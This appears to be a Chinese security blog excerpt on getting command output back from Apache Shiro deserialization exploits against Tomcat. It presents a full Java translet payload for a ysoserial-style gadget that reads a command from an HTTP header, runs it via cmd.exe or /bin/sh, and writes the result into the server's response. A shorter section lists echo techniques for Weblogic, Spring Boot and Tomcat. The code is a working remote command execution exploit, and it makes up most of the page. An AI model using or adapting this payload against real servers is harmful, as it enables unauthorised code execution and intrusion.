0%

shiro回显

修改Gadgets.java文件中的内容:

  1. StubTransletPayload.class –> Tomback.class
  2. 修改createTemplatesImpl(final String cmd)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
public static class Tomback extends AbstractTranslet {

public Object getO(Object o,String s) throws Exception{
Field f = o.getClass().getDeclaredField(s);
f.setAccessible(true);
return f.get(o);
}

public Tomback() throws Exception{
Object o;
String s;
for (Thread t:(Thread[])getO(Thread.currentThread().getThreadGroup(),"threads")){
s = t.getName();
if (!s.contains("exec") && s.contains("http")){
try{
o = getO(getO(getO(t,"target"),"this$0"),"handler");
}catch (Exception e){
//tomcat 8.5.* ~
o = getO(getO(t,"target"),"this$0");
Field f = AbstractEndpoint.class.getDeclaredField("handler");
f.setAccessible(true);
o = f.get(o);
}
try{
//tomcat 6.*
o = getO(o,"global");
}catch (Exception e){
//tomcat7.*-8.0.*
o = o.getClass().getSuperclass().getDeclaredMethod("getGlobal").invoke(o);
}
for (Object p:(ArrayList<?>)getO(o,"processors")){
o = getO(p,"req");
s = (String)o.getClass().getMethod("getHeader",String.class).invoke(o,"ca");
if(!s.isEmpty()){
String[] cmd = System.getProperty("os.name").toLowerCase().contains("window")?new String[]{"cmd.exe","/c",s}:new String[]{"/bin/sh","-c",s};
byte[] cm = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
ByteChunk bc = new ByteChunk();
bc.setBytes(cm,0,cm.length);
o = o.getClass().getMethod("getResponse").invoke(o);
o.getClass().getMethod("setStatus",int.class).invoke(o,404);
o.getClass().getMethod("doWrite",ByteChunk.class).invoke(o,bc);
break;
}
}
break;
}
}
}

public void transform ( DOM document, SerializationHandler[] handlers ) throws TransletException {}


@Override
public void transform ( DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {}
}


public static Object createTemplatesImpl(final String cmd) throws Exception {
TemplatesImpl templates = TemplatesImpl.class.newInstance();
ClassPool classPool = ClassPool.getDefault();
classPool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
classPool.insertClassPath(new ClassClassPath(Tomback.class));
CtClass clazz = classPool.get(Tomback.class.getName());
CtClass superC = classPool.get(AbstractTranslet.class.getName());
clazz.setSuperclass(superC);
final byte[] classBytes = clazz.toBytecode();
Field bcField = TemplatesImpl.class.getDeclaredField("_bytecodes");
bcField.setAccessible(true);
bcField.set(templates, new byte[][] {classBytes});
Field nameField = TemplatesImpl.class.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates, "a");
clazz.writeFile();
return templates;
}

效果

reference:https://xz.aliyun.com/t/6227

Read more »

中间件context回显方式

1
2
3
4
5
6
7
8
# Weblogic回显
1. Thread -> getCurrentWork --> context
2. Thread --> getCurrentWork --> connectionHandler --> context
# Spring Boot回显
1. org.springframework.web.context.request.RequestContextHolder
2. org.springframework.webflow.context.ExternalContextHolder
# tomcat回显
1. Linux平台下,利用文件描述符回显

reference:00theway

回显研究

1.Get tomcat Channel

从Thread.currentThread()出发,发现当前线程有关FD描述符的路径:

1
2
3
Thread-->target-->selector[SelectorImpl]-->fdMap-->key-value-->SocketChannel

[SelectorImpl针对不同平台有不同实现:EpollSelectorImpl(linux)、WindowsSelectorImpl(windows)、KQueueSelectorImpl(MacOSX)]

通过这种方式可以跨平台对SocketChannel进行写入操作,达到回显的效果。
缺点:对http的所有连接都会回写,无法筛选当前请求的唯一连接。

伪代码:

Read more »